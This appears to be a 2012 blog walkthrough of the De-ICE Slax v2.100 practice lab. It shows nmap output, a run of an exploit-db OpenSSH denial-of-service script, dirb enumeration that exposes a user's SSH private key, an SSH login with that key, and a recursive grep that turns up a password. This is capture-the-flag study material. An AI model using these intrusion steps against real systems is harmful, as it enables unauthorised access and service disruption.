Slax De-ICE v2.100 Solution

Posted by shinigami at 07:46 Read our previous post

#Information Gathering

Scaning using Netdiscover :

Scanning with Nmap :

result for information gathering:

root@bt:~# nmap -sS -A 192.168.2.100

Starting Nmap 6.01 ( http://nmap.org ) at 2012-11-12 04:49 EST
Nmap scan report for 192.168.2.100
Host is up (0.0011s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)
| 2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)
|_2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)
25/tcp open smtp Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.2.105], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP,
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP ". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Openwall popa3d
|_pop3-capabilities: capa
143/tcp open imap UW imapd 2004.357
|_imap-capabilities: LOGIN-REFERRALS THREAD=ORDEREDSUBJECT UNSELECT SCAN AUTH=LOGINA0001 MAILBOX-REFERRALS BINARY IMAP4REV1 completed THREAD=REFERENCES SASL-IR OK CAPABILITY SORT STARTTLS LITERAL+ IDLE NAMESPACE MULTIAPPEND
443/tcp closed https
MAC Address: 08:00:27:E7:A0:2B (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Host: slax.example.net; OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 1.13 ms 192.168.2.100

In address 192.168.2.100:80 I have found some credential information about developer and marketer.

# Service Enumeration

20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
25/tcp open smtp Sendmail 8.13.7/8.13.7
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357

# Vulnerability Assesment

1.    FTP Login Anonymous allowed
2.    OpenSSH Denial of Service
3.    Directory Listing

# Exploitation

First, I'm interesting with FTP login but I dont't get anything in the ftp.

Second, I have try on openSSH with vulnerable DOS. Try using this exploit and the ssh service temporary down. /pentest/exploits/exploitdb# platforms/multiple/dos/2444.sh

Third, I'm trying to directory listing on http service. this part separated into 3 step :

Create userlisting from available info in their web site.
Create file listing for common user in linux syste,
Combination userlisting and filelisting with dirb, dirb available in backtrack.

root@bt:/pentest/web/dirb# ./dirb http://192.168.2.101/ /root/Slax2.100/credential.txt,/root/Slax2.100/filelist.txt -w -l

Dirb usage:

From the dirb, you can see ~pirrip/.ssh/ listing. Then open it from your browser and download the id_rsa and id_rsa.pub. Two files is ssh key authentication. Now connect to the machine target with ssh.

# ssh -i id_rsa pirrip@192.168.2.100

Well, we have connected into target machine. But we don't know what is the password of pirrip.

Finally I'm using grep to find string with password.

# grep -r "Password" /

For the long time, I got the password of pirrip -> 0l1v3rtw1st

SECURITY

Pages

Wednesday, 14 November 2012